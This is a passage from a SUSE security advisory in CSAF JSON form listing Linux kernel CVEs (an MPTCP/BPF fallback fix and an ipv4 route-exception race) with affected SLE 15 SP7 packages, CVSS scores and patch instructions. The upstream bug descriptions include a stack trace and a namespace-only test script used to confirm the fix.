"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68215"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
